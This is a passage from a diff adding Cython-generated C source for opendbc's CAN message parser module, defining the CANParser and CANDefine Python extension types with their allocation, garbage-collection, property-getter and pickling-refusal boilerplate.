TypeError, "self.dbc cannot be converted to a Python object for pickling" + * def __setstate_cython__(self, __pyx_state): + * raise TypeError, "self.dbc cannot be converted to a Python object for pickling" # <<<<<<<<<<<<<< + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_self_dbc_cannot_be_converted_to, 0, 0); + __PYX_ERR(1, 4, __pyx_L1_error) + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "self.dbc cannot be converted to a Python object for pickling" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "self.dbc cannot be converted to a Python object for pickling" + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("opendbc.can.parser_pyx.CANDefine.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_tp_new_7opendbc_3can_10parser_pyx_CANParser(PyTypeObject *t, CYTHON_UNUSED PyObject *a, CYTHON_UNUSED PyObject *k) { + struct __pyx_obj_7opendbc_3can_10parser_pyx_CANParser *p; + PyObject *o; + #if CYTHON_COMPILING_IN_LIMITED_API + allocfunc alloc_func = (allocfunc)PyType_GetSlot(t, Py_tp_alloc); + o = alloc_func(t, 0); + #else + if (likely(!__Pyx_PyType_HasFeature(t, Py_TPFLAGS_IS_ABSTRACT))) { + o = (*t->tp_alloc)(t, 0); + } else { + o = (PyObject *) PyBaseObject_Type.tp_new(t, __pyx_empty_tuple, 0); + } + if (unlikely(!o)) return 0; + #endif + p = ((struct __pyx_obj_7opendbc_3can_10parser_pyx_CANParser *)o); + new((void*)&(p->address_to_msg_name)) std::map (); + new((void*)&(p->can_values)) std::vector (); + new((void*)&(p->dbc_name)) std::string(); + p->vl = ((PyObject*)Py_None); Py_INCREF(Py_None); + p->vl_all = ((PyObject*)Py_None); Py_INCREF(Py_None); + p->ts_nanos = ((PyObject*)Py_None); Py_INCREF(Py_None); + return o; +} + +static void __pyx_tp_dealloc_7opendbc_3can_10parser_pyx_CANParser(PyObject *o) { + struct __pyx_obj_7opendbc_3can_10parser_pyx_CANParser *p = (struct __pyx_obj_7opendbc_3can_10parser_pyx_CANParser *)o; + #if CYTHON_USE_TP_FINALIZE + if (unlikely((PY_VERSION_HEX >= 0x03080000 || __Pyx_PyType_HasFeature(Py_TYPE(o), Py_TPFLAGS_HAVE_FINALIZE)) && __Pyx_PyObject_GetSlot(o, tp_finalize, destructor)) && !__Pyx_PyObject_GC_IsFinalized(o)) { + if (__Pyx_PyObject_GetSlot(o, tp_dealloc, destructor) == __pyx_tp_dealloc_7opendbc_3can_10parser_pyx_CANParser) { + if (PyObject_CallFinalizerFromDealloc(o)) return; + } + } + #endif + PyObject_GC_UnTrack(o); + __Pyx_call_destructor(p->address_to_msg_name); + __Pyx_call_destructor(p->can_values); + __Pyx_call_destructor(p->dbc_name); + Py_CLEAR(p->vl); + Py_CLEAR(p->vl_all); + Py_CLEAR(p->ts_nanos); + (*Py_TYPE(o)->tp_free)(o); +} + +static int __pyx_tp_traverse_7opendbc_3can_10parser_pyx_CANParser(PyObject *o, visitproc v, void *a) { + int e; + struct __pyx_obj_7opendbc_3can_10parser_pyx_CANParser *p = (struct __pyx_obj_7opendbc_3can_10parser_pyx_CANParser *)o; + if (p->vl) { + e = (*v)(p->vl, a); if (e) return e; + } + if (p->vl_all) { + e = (*v)(p->vl_all, a); if (e) return e; + } + if (p->ts_nanos) { + e = (*v)(p->ts_nanos, a); if (e) return e; + } + return 0; +} + +static int __pyx_tp_clear_7opendbc_3can_10parser_pyx_CANParser(PyObject *o) { + PyObject* tmp; + struct __pyx_obj_7opendbc_3can_10parser_pyx_CANParser *p = (struct __pyx_obj_7opendbc_3can_10parser_pyx_CANParser *)o; + tmp = ((PyObject*)p->vl); + p->vl = ((PyObject*)Py_None); Py_INCREF(Py_None); + Py_XDECREF(tmp); + tmp = ((PyObject*)p->vl_all); + p->vl_all = ((PyObject*)Py_None); Py_INCREF(Py_None); + Py_XDECREF(tmp); + tmp = ((PyObject*)p->ts_nanos); + p->ts_nanos = ((PyObject*)Py_None); Py_INCREF(Py_None); + Py_XDECREF(tmp); + return 0; +} + +static PyObject *__pyx_getprop_7opendbc_3can_10parser_pyx_9CANParser_can_valid(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_7opendbc_3can_10parser_pyx_9CANParser_9can_valid_1__get__(o); +} + +static PyObject *__pyx_getprop_7opendbc_3can_10parser_pyx_9CANParser_bus_timeout(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_7opendbc_3can_10parser_pyx_9CANParser_11bus_timeout_1__get__(o); +} + +static PyObject *__pyx_getprop_7opendbc_3can_10parser_pyx_9CANParser_vl(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_7opendbc_3can_10parser_pyx_9CANParser_2vl_1__get__(o); +} + +static PyObject *__pyx_getprop_7opendbc_3can_10parser_pyx_9CANParser_vl_all(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_7opendbc_3can_10parser_pyx_9CANParser_6vl_all_1__get__(o); +} + +static PyObject *__pyx_getprop_7opendbc_3can_10parser_pyx_9CANParser_ts_nanos(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_7opendbc_3can_10parser_pyx_9CANParser_8ts_nanos_1__get__(o); +} + +static PyObject *__pyx_getprop_7opendbc_3can_10parser_pyx_9CANParser_dbc_name(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_7opendbc_3can_10parser_pyx_9CANParser_8dbc_name_1__get__(o); +} + +static PyMethodDef __pyx_methods_7opendbc_3can_10parser_pyx_CANParser[] = { + {"update_strings", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_7opendbc_3can_10parser_pyx_9CANParser_3update_strings, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"__reduce_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_7opendbc_3can_10parser_pyx_9CANParser_5__reduce_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"__setstate_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_7opendbc_3can_10parser_pyx_9CANParser_7__setstate_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {0, 0, 0, 0} +}; + +static struct PyGetSetDef __pyx_getsets_7opendbc_3can_10parser_pyx_CANParser[] = { + {(char *)"can_valid", __pyx_getprop_7opendbc_3can_10parser_pyx_9CANParser_can_valid, 0, (char *)0, 0}, + {(char *)"bus_timeout", __pyx_getprop_7opendbc_3can_10parser_pyx_9CANParser_bus_timeout, 0, (char *)0, 0}, + {(char *)"vl", __pyx_getprop_7opendbc_3can_10parser_pyx_9CANParser_vl, 0, (char *)0, 0}, + {(char *)"vl_all", __pyx_getprop_7opendbc_3can_10parser_pyx_9CANParser_vl_all, 0, (char *)0, 0}, + {(char *)"ts_nanos", __pyx_getprop_7opendbc_3can_10parser_pyx_9CANParser_ts_nanos, 0, (char *)0, 0}, + {(char *)"dbc_name", __pyx_getprop_7opendbc_3can_10parser_pyx_9CANParser_dbc_name, 0, (char *)0, 0}, + {0, 0, 0, 0, 0} +}; +#if CYTHON_USE_TYPE_SPECS +static PyType_Slot __pyx_type_7opendbc_3can_10parser_pyx_CANParser_slots[] = { + {Py_tp_dealloc, (void *)__pyx_tp_dealloc_7opendbc_3can_10parser_pyx_CANParser}, + {Py_tp_traverse, (void *)__pyx_tp_traverse_7opendbc_3can_10parser_pyx_CANParser}, + {Py_tp_clear, (void *)__pyx_tp_clear_7opendbc_3can_10parser_pyx_CANParser}, + {Py_tp_methods, (void *)__pyx_methods_7opendbc_3can_10parser_pyx_CANParser}, + {Py_tp_getset, (void *)__pyx_getsets_7opendbc_3can_10parser_pyx_CANParser}, + {Py_tp_init, (void *)__pyx_pw_7opendbc_3can_10parser_pyx_9CANParser_1__init__}, + {Py_tp_new, (void *)__pyx_tp_new_7opendbc_3can_10parser_pyx_CANParser}, + {0, 0}, +}; +static PyType_Spec __pyx_type_7opendbc_3can_10parser_pyx_CANParser_spec = { + "opendbc.can.parser_pyx.CANParser", + sizeof(struct __pyx_obj_7opendbc_3can_10parser_pyx_CANParser), + 0, + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE|Py_TPFLAGS_HAVE_GC, + __pyx_type_7opendbc_3can_10parser_pyx_CANParser_slots, +}; +#else + +static PyTypeObject __pyx_type_7opendbc_3can_10parser_pyx_CANParser = { + PyVarObject_HEAD_INIT(0, 0) + "opendbc.can.parser_pyx.""CANParser", /*tp_name*/ + sizeof(struct __pyx_obj_7opendbc_3can_10parser_pyx_CANParser), /*tp_basicsize*/ + 0, /*tp_itemsize*/ + __pyx_tp_dealloc_7opendbc_3can_10parser_pyx_CANParser, /*tp_dealloc*/ + #if PY_VERSION_HEX < 0x030800b4 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030800b4 + 0, /*tp_vectorcall_offset*/ + #endif + 0, /*tp_getattr*/ + 0, /*tp_setattr*/ + #if PY_MAJOR_VERSION < 3 + 0, /*tp_compare*/ + #endif + #if PY_MAJOR_VERSION >= 3 + 0, /*tp_as_async*/ + #endif + 0, /*tp_repr*/ + 0, /*tp_as_number*/ + 0, /*tp_as_sequence*/ + 0, /*tp_as_mapping*/ + 0, /*tp_hash*/ + 0, /*tp_call*/ + 0, /*tp_str*/ + 0, /*tp_getattro*/ + 0, /*tp_setattro*/ + 0, /*tp_as_buffer*/ + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE|Py_TPFLAGS_HAVE_GC, /*tp_flags*/ + 0, /*tp_doc*/ + __pyx_tp_traverse_7opendbc_3can_10parser_pyx_CANParser, /*tp_traverse*/ + __pyx_tp_clear_7opendbc_3can_10parser_pyx_CANParser, /*tp_clear*/ + 0, /*tp_richcompare*/ + 0, /*tp_weaklistoffset*/ + 0, /*tp_iter*/ + 0, /*tp_iternext*/ + __pyx_methods_7opendbc_3can_10parser_pyx_CANParser, /*tp_methods*/ + 0, /*tp_members*/ + __pyx_getsets_7opendbc_3can_10parser_pyx_CANParser, /*tp_getset*/ + 0, /*tp_base*/ + 0, /*tp_dict*/ + 0, /*tp_descr_get*/ + 0, /*tp_descr_set*/ + #if !CYTHON_USE_TYPE_SPECS + 0, /*tp_dictoffset*/ + #endif + __pyx_pw_7opendbc_3can_10parser_pyx_9CANParser_1__init__, /*tp_init*/ + 0, /*tp_alloc*/ + __pyx_tp_new_7opendbc_3can_10parser_pyx_CANParser, /*tp_new*/ + 0, /*tp_free*/ + 0, /*tp_is_gc*/ + 0, /*tp_bases*/ + 0, /*tp_mro*/ + 0, /*tp_cache*/ + 0, /*tp_subclasses*/ + 0, /*tp_weaklist*/ + 0, /*tp_del*/ + 0, /*tp_version_tag*/ + #if PY_VERSION_HEX >= 0x030400a1 + #if CYTHON_USE_TP_FINALIZE + 0, /*tp_finalize*/ + #else + NULL, /*tp_finalize*/ + #endif + #endif + #if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) + 0, /*tp_vectorcall*/ + #endif + #if __PYX_NEED_TP_PRINT_SLOT == 1 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030C0000 + 0, /*tp_watched*/ + #endif + #if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 + 0, /*tp_pypy_flags*/ + #endif +}; +#endif + +static PyObject *__pyx_tp_new_7opendbc_3can_10parser_pyx_CANDefine(PyTypeObject *t, CYTHON_UNUSED PyObject *a, CYTHON_UNUSED PyObject *k) { + struct __pyx_obj_7opendbc_3can_10parser_pyx_CANDefine *p; + PyObject *o; + #if CYTHON_COMPILING_IN_LIMITED_API + allocfunc alloc_func = (allocfunc)PyType_GetSlot(t, Py_tp_alloc); + o = alloc_func(t, 0); + #else + if (likely(!__Pyx_PyType_HasFeature(t, Py_TPFLAGS_IS_ABSTRACT))) { + o = (*t->tp_alloc)(t, 0); + } else { + o = (PyObject *) PyBaseObject_Type.tp_new(t, __pyx_empty_tuple, 0); + } + if (unlikely(!o)) return 0; + #endif + p = ((struct __pyx_obj_7opendbc_3can_10parser_pyx_CANDefine *)o); + new((void*)&(p->dbc_name)) std::string(); + p->dv = ((PyObject*)Py_None); Py_INCREF(Py_None); + return o; +} + +static void __pyx_tp_dealloc_7opendbc_3can_10parser_pyx_CANDefine(PyObject *o) { + struct __pyx_obj_7opendbc_3can_10parser_pyx_CANDefine *p = (struct __pyx_obj_7opendbc_3can_10parser_pyx_CANDefine *)o; + #if CYTHON_USE_TP_FINALIZE + if (unlikely((PY_VERSION_HEX >= 0x03080000 || __Pyx_PyType_HasFeature(Py_TYPE(o), Py_TPFLAGS_HAVE_FINALIZE)) && __Pyx_PyObject_GetSlot(o, tp_finalize, destructor)) && !__Pyx_PyObject_GC_IsFinalized(o)) { + if (__Pyx_PyObject_GetSlot(o, tp_dealloc, destructor) == __pyx_tp_dealloc_7opendbc_3can_10parser_pyx_CANDefine) { + if (PyObject_CallFinalizerFromDealloc(o)) return; + } + } + #endif + PyObject_GC_UnTrack(o); + __Pyx_call_destructor(p->dbc_name); + Py_CLEAR(p->dv); + (*Py_TYPE(o)->tp_free)(o); +} + +static int __pyx_tp_traverse_7opendbc_3can_10parser_pyx_CANDefine(PyObject *o, visitproc v, void *a) { + int e; + struct __pyx_obj_7opendbc_3can_10parser_pyx_CANDefine *p = (struct __pyx_obj_7opendbc_3can_10parser_pyx_CANDefine *)o; + if (p->dv) { + e = (*v)(p->dv, a); if (e) return e; + } + return 0; +} + +static int __pyx_tp_clear_7opendbc_3can_10parser_pyx_CANDefine(PyObject *o) { + PyObject* tmp; + struct __pyx_obj_7opendbc_3can_10parser_pyx_CANDefine *p = (struct __pyx_obj_7opendbc_3can_10parser_pyx_CANDefine *)o; + tmp = ((PyObject*)p->dv); + p->dv = ((PyObject*)Py_None); Py_INCREF(Py_None); + Py_XDECREF(tmp); + return 0; +} + +static PyObject *__pyx_getprop_7opendbc_3can_10parser_pyx_9CANDefine_dv(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_7opendbc_3can_10parser_pyx_9CANDefine_2dv_1__get__(o); +} + +static int __pyx_setprop_7opendbc_3can_10parser_pyx_9CANDefine_dv(PyObject *o, PyObject *v, CYTHON_UNUSED void *x) { + if (v) { + return __pyx_pw_7opendbc_3can_10parser_pyx_9CANDefine_2dv_3__set__(o, v); + } + else { + return __pyx_pw_7opendbc_3can_10parser_pyx_9CANDefine_2dv_5__del__(o); + } +} + +static PyObject *__pyx_getprop_7opendbc_3can_10parser_pyx_9CANDefine_dbc_name(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_7opendbc_3can_10parser_pyx_9CANDefine_8dbc_name_1__get__(o); +} + +static int __pyx_setprop_7opendbc_3can_10parser_pyx_9CANDefine_dbc_name(PyObject *o, PyObject *v, CYTHON_UNUSED void *x) { + if (v) { + return __pyx_pw_7opendbc_3can_10parser_pyx_9CANDefine_8dbc_name_3__set__(o, v); + } + else { + PyErr_SetString(PyExc_NotImplementedError, "__del__"); + return -1; + } +} + +static PyMethodDef __pyx_methods_7opendbc_3can_10parser_pyx_CANDefine[] = { + {"__reduce_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_7opendbc_3can_10parser_pyx_9CANDefine_3__reduce_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"__setstate_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_7opendbc_3can_10parser_pyx_9CANDefine_5__setstate_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {0, 0, 0, 0} +}; + +static struct PyGetSetDef __pyx_getsets_7opendbc_3can_10parser_pyx_CANDefine[] = { + {(char *)"dv", __pyx_getprop_7opendbc_3can_10parser_pyx_9CANDefine_dv, __pyx_setprop_7opendbc_3can_10parser_pyx_9CANDefine_dv, (char *)0, 0}, + {(char *)"dbc_name", __pyx_getprop_7opendbc_3can_10parser_pyx_9CANDefine_dbc_name, __pyx_setprop_7opendbc_3can_10parser_pyx_9CANDefine_dbc_name, (char *)0, 0}, + {0, 0, 0, 0, 0} +}; +#if CYTHON_USE_TYPE_SPECS +static PyType_Slot __pyx_type_7opendbc_3can_10parser_pyx_CANDefine_slots[] = { + {Py_tp_dealloc, (void *)__pyx_tp_dealloc_7opendbc_3can_10parser_pyx_CANDefine}, + {Py_tp_traverse, (void *)__pyx_tp_traverse_7opendbc_3can_10parser_pyx_CANDefine}, + {Py_tp_clear, (void *)__pyx_tp_clear_7opendbc_3can_10parser_pyx_CANDefine}, + {Py_tp_methods, (void *)__pyx_methods_7opendbc_3can_10parser_pyx_CANDefine}, + {Py_tp_getset, (void *)__pyx_getsets_7opendbc_3can_10parser_pyx_CANDefine}, + {Py_tp_init, (void *)__pyx_pw_7opendbc_3can_10parser_pyx_9CANDefine_1__init__}, + {Py_tp_new, (void *)__pyx_tp_new_7opendbc_3can_10parser_pyx_CANDefine}, + {0, 0}, +}; +static PyType_Spec __pyx_type_7opendbc_3can_10parser_pyx_CANDefine_spec = { + "opendbc.can.parser_pyx.CANDefine", + sizeof(struct __pyx_obj_7opendbc_3can_10parser_pyx_CANDefine), + 0, + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE|Py_TPFLAGS_HAVE_GC, + __pyx_type_7opendbc_3can_10parser_pyx_CANDefine_slots, +}; +#else + +static PyTypeObject __pyx_type_7opendbc_3can_10parser_pyx_CANDefine = { + PyVarObject_HEAD_INIT(0, 0) + "opendbc.can.parser_pyx.""CANDefine", /*tp_name*/ + sizeof(struct __pyx_obj_7opendbc_3can_10parser_pyx_CANDefine), /*tp_basicsize*/ + 0, /*tp_itemsize*/ + __pyx_tp_dealloc_7opendbc_3can_10parser_pyx_CANDefine, /*tp_dealloc*/ + #if PY_VERSION_HEX < 0x030800b4 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030800b4 + 0, /*tp_vectorcall_offset*/ + #endif + 0, /*tp_getattr*/ + 0, /*tp_setattr*/ + #if PY_MAJOR_VERSION < 3 + 0, /*tp_compare*/ + #endif + #if PY_MAJOR_VERSION >= 3 + 0, /*tp_as_async*/ + #endif + 0, /*tp_repr*/ + 0, /*tp_as_number*/ + 0, /*tp_as_sequence*/ + 0, /*tp_as_mapping*/ + 0, /*tp_hash*/ + 0, /*tp_call*/ + 0, /*tp_str*/ + 0, /*tp_getattro*/ + 0, /*tp_setattro*/ + 0, /*tp_as_buffer*/ + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE|Py_TPFLAGS_HAVE_GC, /*tp_flags*/ + 0, /*tp_doc*/ + __pyx_tp_traverse_7opendbc_3can_10parser_pyx_CANDefine, /*tp_traverse*/ + __pyx_tp_clear_7opendbc_3can_10parser_pyx_CANDefine, /*tp_clear*/ + 0, /*tp_richcompare*/ + 0, /*tp_weaklistoffset*/ + 0, /*tp_iter*/ + 0, /*tp_iternext*/ + __pyx_methods_7opendbc_3can_10parser_pyx_CANDefine, /*tp_methods*/ + 0, /*tp_members*/ + __pyx_getsets_7opendbc_3can_10parser_pyx_CANDefine, /*tp_getset*/ + 0, /*tp_base*/ + 0, /*tp_dict*/ + 0, /*tp_descr_get*/ + 0, /*tp_descr_set*/ + #if !CYTHON_USE_TYPE_SPECS + 0, /*tp_dictoffset*/ + #endif + __pyx_pw_7opendbc_3can_10parser_pyx_9CANDefine_1__init__, /*tp_init*/ + 0, /*tp_alloc*/ + __pyx_tp_new_7opendbc_3can_10parser_pyx_CANDefine, /*tp_new*/ + 0, /*tp_free*/ + 0, /*tp_is_gc*/ + 0, /*tp_bases*/ + 0, /*tp_mro*/ + 0, /*tp_cache*/ + 0, /*tp_subclasses*/ + 0, /*tp_weaklist*/ + 0, /*tp_del*/ + 0, /*tp_version_tag*/ + #if PY_VERSION_HEX >= 0x030400a1 + #if CYTHON_USE_TP_FINALIZE + 0, /*tp_finalize*/ + #else + NULL, /*tp_finalize*/ + #endif + #endif + #if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) + 0, /*tp_vectorcall*/ + #endif + #if __PYX_NEED_TP_PRINT_SLOT == 1 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030C0000 + 0, /*tp_watched*/ + #endif + #if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 + 0, /*tp_pypy_flags*/ + #endif +}; +#endif + +static struct __pyx_obj_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__ *__pyx_freelist_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__[8]; +static int __pyx_freecount_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__ = 0; + +static PyObject *__pyx_tp_new_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__(PyTypeObject *t, CYTHON_UNUSED PyObject *a, CYTHON_UNUSED PyObject *k) { + PyObject *o; + #if CYTHON_COMPILING_IN_LIMITED_API + allocfunc alloc_func = (allocfunc)PyType_GetSlot(t, Py_tp_alloc); + o = alloc_func(t, 0); + #else + if (CYTHON_COMPILING_IN_CPYTHON && likely((int)(__pyx_freecount_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__ > 0) & (int)(t->tp_basicsize == sizeof(struct __pyx_obj_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__)))) { + o = (PyObject*)__pyx_freelist_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__[--__pyx_freecount_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__]; + memset(o, 0, sizeof(struct __pyx_obj_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__)); + (void) PyObject_INIT(o, t); + PyObject_GC_Track(o); + } else { + o = (*t->tp_alloc)(t, 0); + if (unlikely(!o)) return 0; + } + #endif + return o; +} + +static void __pyx_tp_dealloc_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__(PyObject *o) { + struct __pyx_obj_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__ *p = (struct __pyx_obj_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__ *)o; + #if CYTHON_USE_TP_FINALIZE + if (unlikely((PY_VERSION_HEX >= 0x03080000 || __Pyx_PyType_HasFeature(Py_TYPE(o), Py_TPFLAGS_HAVE_FINALIZE)) && __Pyx_PyObject_GetSlot(o, tp_finalize, destructor)) && !__Pyx_PyObject_GC_IsFinalized(o)) { + if (__Pyx_PyObject_GetSlot(o, tp_dealloc, destructor) == __pyx_tp_dealloc_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__) { + if (PyObject_CallFinalizerFromDealloc(o)) return; + } + } + #endif + PyObject_GC_UnTrack(o); + Py_CLEAR(p->__pyx_v_self); + if (CYTHON_COMPILING_IN_CPYTHON && ((int)(__pyx_freecount_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__ < 8) & (int)(Py_TYPE(o)->tp_basicsize == sizeof(struct __pyx_obj_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__)))) { + __pyx_freelist_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__[__pyx_freecount_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__++] = ((struct __pyx_obj_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__ *)o); + } else { + (*Py_TYPE(o)->tp_free)(o); + } +} + +static int __pyx_tp_traverse_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__(PyObject *o, visitproc v, void *a) { + int e; + struct __pyx_obj_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__ *p = (struct __pyx_obj_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__ *)o; + if (p->__pyx_v_self) { + e = (*v)(((PyObject *)p->__pyx_v_self), a); if (e) return e; + } + return 0; +} + +static int __pyx_tp_clear_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__(PyObject *o) { + PyObject* tmp; + struct __pyx_obj_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__ *p = (struct __pyx_obj_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__ *)o; + tmp = ((PyObject*)p->__pyx_v_self); + p->__pyx_v_self = ((struct __pyx_obj_7opendbc_3can_10parser_pyx_CANParser *)Py_None); Py_INCREF(Py_None); + Py_XDECREF(tmp); + return 0; +} +#if CYTHON_USE_TYPE_SPECS +static PyType_Slot __pyx_type_7opendbc_3can_10parser_pyx___pyx_scope_struct____init___slots[] = { + {Py_tp_dealloc, (void *)__pyx_tp_dealloc_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__}, + {Py_tp_traverse, (void *)__pyx_tp_traverse_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__}, + {Py_tp_clear, (void *)__pyx_tp_clear_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__}, + {Py_tp_new, (void *)__pyx_tp_new_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__}, + {0, 0}, +}; +static PyType_Spec __pyx_type_7opendbc_3can_10parser_pyx___pyx_scope_struct____init___spec = { + "opendbc.can.parser_pyx.__pyx_scope_struct____init__", + sizeof(struct __pyx_obj_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__), + 0, + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_HAVE_GC|Py_TPFLAGS_HAVE_FINALIZE, + __pyx_type_7opendbc_3can_10parser_pyx___pyx_scope_struct____init___slots, +}; +#else + +static PyTypeObject __pyx_type_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__ = { + PyVarObject_HEAD_INIT(0, 0) + "opendbc.can.parser_pyx.""__pyx_scope_struct____init__", /*tp_name*/ + sizeof(struct __pyx_obj_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__), /*tp_basicsize*/ + 0, /*tp_itemsize*/ + __pyx_tp_dealloc_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__, /*tp_dealloc*/ + #if PY_VERSION_HEX < 0x030800b4 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030800b4 + 0, /*tp_vectorcall_offset*/ + #endif + 0, /*tp_getattr*/ + 0, /*tp_setattr*/ + #if PY_MAJOR_VERSION < 3 + 0, /*tp_compare*/ + #endif + #if PY_MAJOR_VERSION >= 3 + 0, /*tp_as_async*/ + #endif + 0, /*tp_repr*/ + 0, /*tp_as_number*/ + 0, /*tp_as_sequence*/ + 0, /*tp_as_mapping*/ + 0, /*tp_hash*/ + 0, /*tp_call*/ + 0, /*tp_str*/ + 0, /*tp_getattro*/ + 0, /*tp_setattro*/ + 0, /*tp_as_buffer*/ + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_HAVE_GC|Py_TPFLAGS_HAVE_FINALIZE, /*tp_flags*/ + 0, /*tp_doc*/ + __pyx_tp_traverse_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__, /*tp_traverse*/ + __pyx_tp_clear_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__, /*tp_clear*/ + 0, /*tp_richcompare*/ + 0, /*tp_weaklistoffset*/ + 0, /*tp_iter*/ + 0, /*tp_iternext*/ + 0, /*tp_methods*/ + 0, /*tp_members*/ + 0, /*tp_getset*/ + 0, /*tp_base*/ + 0, /*tp_dict*/ + 0, /*tp_descr_get*/ + 0, /*tp_descr_set*/ + #if !CYTHON_USE_TYPE_SPECS + 0, /*tp_dictoffset*/ + #endif + 0, /*tp_init*/ + 0, /*tp_alloc*/ + __pyx_tp_new_7opendbc_3can_10parser_pyx___pyx_scope_struct____init__, /*tp_new*/ + 0, /*tp_free*/ + 0, /*tp_is_gc*/ + 0, /*tp_bases*/ + 0, /*tp_mro*/ + 0, /*tp_cache*/ + 0, /*tp_subclasses*/ + 0, /*tp_weaklist*/ + 0, /*tp_del*/ + 0, /*tp_version_tag*/ + #if PY_VERSION_HEX >= 0x030400a1 + #if CYTHON_USE_TP_FINALIZE + 0, /*tp_finalize*/ + #else + NULL, /*tp_finalize*/ + #endif + #endif + #if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) + 0, /*tp_vectorcall*/ + #endif + #if __PYX_NEED_TP_PRINT_SLOT == 1 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030C0000 + 0, /*tp_watched*/ + #endif + #if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 + 0, 